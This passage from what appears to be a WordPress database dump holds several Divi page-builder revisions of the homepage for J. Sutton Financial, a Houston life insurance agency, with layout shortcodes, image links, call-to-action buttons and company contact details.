custom_margin=\"|||0px||\" custom_padding=\"|||0px||\" animation_style=\"bounce\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"||141px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" header_text_color=\"#FFFFFF\" header_2_text_color=\"#FFFFFF\" custom_margin=\"30px||||false|false\" custom_padding=\"148px||66px||false|false\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\">Proudly Headquartered in Houston, Texas</h2>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" height=\"148px\" custom_margin=\"-20px|auto||auto|false|false\" custom_padding=\"66px||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" title_text=\"j sutton logo white no background\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"46.1%\" custom_margin=\"|188px||188px||true\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on|||#f9f9f9|dotted\" link_text_color=\"#f9f9f9\" background_layout=\"dark\" custom_margin=\"12px|||||\" custom_padding=\"0px|0px|0px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\">340 North Sam Houston Parkway East<br />Houston, TX 77060<br /><a href=\"mailto:info@JSuttonFinancial.com\">info@JSuttonFinancial.com</a><br /><a href=\"tel:713-254-3439\">(713) 254-3439</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on||||dotted\" link_text_align=\"center\" link_text_color=\"#FFFFFF\" text_orientation=\"center\" background_layout=\"dark\" min_height=\"24.8px\" custom_margin=\"||66px|||\" link_option_url_new_window=\"on\" global_colors_info=\"{}\"]<p>©2023 J. Sutton Financial | All Rights Reserved | <a href=\"/insurance-quote/\" target=\"_blank\" rel=\"noopener\">Privacy Policy</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-02 19:30:53','2023-04-02 19:30:53','',138,'http://cmdev-site1.com/?p=635',0,'revision','',0),(637,1,'2023-04-02 19:33:56','2023-04-02 19:33:56','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\" custom_margin=\"||9px|||\" custom_padding=\"23px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu active_link_color=\"#3f3f3f\" dropdown_menu_line_color=\"#003372\" dropdown_menu_active_link_color=\"#003372\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Justin-Sutton-rev-1_black_on_transparent_high-res-1.png\" logo_width=\"15%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|desktop\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" module_alignment=\"left\" custom_margin=\"-43px|||0px|false|false\" custom_padding=\"|||0px|false|false\" global_colors_info=\"{}\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" global_colors_info=\"{}\"]<h1><span style=\"color: #ffffff;\">J. Sutton Financial, an Independent Agency for American Income Life Insurance Company </span></h1>[/et_pb_text][et_pb_text admin_label=\"Text\" _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" text_font_size=\"18px\" text_orientation=\"center\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<p>J. Sutton Financial is headquartered in Houston, TX and serves multiple communities across the state.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" column_structure=\"1_3,1_3,1_3\" sticky_enabled=\"0\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_two_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Get a Quote\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#FFFFFF\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" button_one_icon=\"&#x77;||divi||400\" button_one_icon_color=\"#FFFFFF\" background_layout=\"dark\" hover_enabled=\"0\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\" button_one_bg_enable_color=\"on\" sticky_enabled=\"0\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"18px||-35px|||\" custom_padding=\"0px|||||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" width=\"100%\" max_width=\"100%\" min_height=\"187.1px\" custom_margin=\"-3px|auto|-74px|auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" title_text=\"Umbrella Roll in Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|37px||89px||\" custom_padding=\"33px|1px||||\" animation_style=\"roll\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#666666\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(224,219,219,0.39)\" custom_margin=\"66px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<p>Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#FFFFFF\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||0px||\" custom_padding=\"|||0px||\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"||141px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" header_text_color=\"#FFFFFF\" header_2_text_color=\"#FFFFFF\" custom_margin=\"30px||||false|false\" custom_padding=\"148px||66px||false|false\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\">Proudly Headquartered in Houston, Texas</h2>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" height=\"148px\" custom_margin=\"-20px|auto||auto|false|false\" custom_padding=\"66px||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" title_text=\"j sutton logo white no background\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"46.1%\" custom_margin=\"|188px||188px||true\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on|||#f9f9f9|dotted\" link_text_color=\"#f9f9f9\" background_layout=\"dark\" custom_margin=\"12px|||||\" custom_padding=\"0px|0px|0px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\">340 North Sam Houston Parkway East<br />Houston, TX 77060<br /><a href=\"mailto:info@JSuttonFinancial.com\">info@JSuttonFinancial.com</a><br /><a href=\"tel:713-254-3439\">(713) 254-3439</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on||||dotted\" link_text_align=\"center\" link_text_color=\"#FFFFFF\" text_orientation=\"center\" background_layout=\"dark\" min_height=\"24.8px\" custom_margin=\"||66px|||\" link_option_url_new_window=\"on\" global_colors_info=\"{}\"]<p>©2023 J. Sutton Financial | All Rights Reserved | <a href=\"/insurance-quote/\" target=\"_blank\" rel=\"noopener\">Privacy Policy</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-02 19:33:56','2023-04-02 19:33:56','',138,'http://cmdev-site1.com/?p=637',0,'revision','',0),(638,1,'2023-04-02 19:37:47','2023-04-02 19:37:47','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\" custom_margin=\"||9px|||\" custom_padding=\"23px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu active_link_color=\"#3f3f3f\" dropdown_menu_line_color=\"#003372\" dropdown_menu_active_link_color=\"#003372\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Justin-Sutton-rev-1_black_on_transparent_high-res-1.png\" logo_width=\"15%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|desktop\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" module_alignment=\"left\" custom_margin=\"-43px|||0px|false|false\" custom_padding=\"|||0px|false|false\" global_colors_info=\"{}\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" global_colors_info=\"{}\"]<h1><span style=\"color: #ffffff;\">J. Sutton Financial, an Independent Agency for American Income Life Insurance Company </span></h1>[/et_pb_text][et_pb_text admin_label=\"Text\" _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" text_font_size=\"18px\" text_orientation=\"center\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<p>J. Sutton Financial is headquartered in Houston, TX and serves multiple communities across the state.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" column_structure=\"1_3,1_3,1_3\" sticky_enabled=\"0\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_two_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Get a Quote\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#FFFFFF\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" button_one_icon=\"&#x77;||divi||400\" button_one_icon_color=\"#FFFFFF\" background_layout=\"dark\" hover_enabled=\"0\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\" button_one_bg_enable_color=\"on\" sticky_enabled=\"0\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"18px||-35px|||\" custom_padding=\"0px|||||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" width=\"100%\" max_width=\"100%\" min_height=\"187.1px\" custom_margin=\"-3px|auto|-74px|auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" title_text=\"Umbrella Roll in Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|37px||89px||\" custom_padding=\"33px|1px||||\" animation_style=\"roll\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#666666\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"4_4\"][dsm_typing_effect _builder_version=\"4.20.2\" _module_preset=\"default\" before_typing_effect=\"Want to know how much you need?\" typing_effect=\"Let\'s find out!\" hover_enabled=\"0\" sticky_enabled=\"0\" header_level=\"h2\" header_text_align=\"center\"][/dsm_typing_effect][dsm_button button_one_text=\"Get a Quote today!\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#ffffff\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" button_one_icon=\"&#x77;||divi||400\" button_one_icon_color=\"#FFFFFF\" hover_enabled=\"0\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\" button_one_bg_enable_color=\"on\" sticky_enabled=\"0\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(224,219,219,0.39)\" custom_margin=\"66px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<p>Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#FFFFFF\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||0px||\" custom_padding=\"|||0px||\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"||141px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" header_text_color=\"#FFFFFF\" header_2_text_color=\"#FFFFFF\" custom_margin=\"30px||||false|false\" custom_padding=\"148px||66px||false|false\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\">Proudly Headquartered in Houston, Texas</h2>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" height=\"148px\" custom_margin=\"-20px|auto||auto|false|false\" custom_padding=\"66px||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" title_text=\"j sutton logo white no background\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"46.1%\" custom_margin=\"|188px||188px||true\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on|||#f9f9f9|dotted\" link_text_color=\"#f9f9f9\" background_layout=\"dark\" 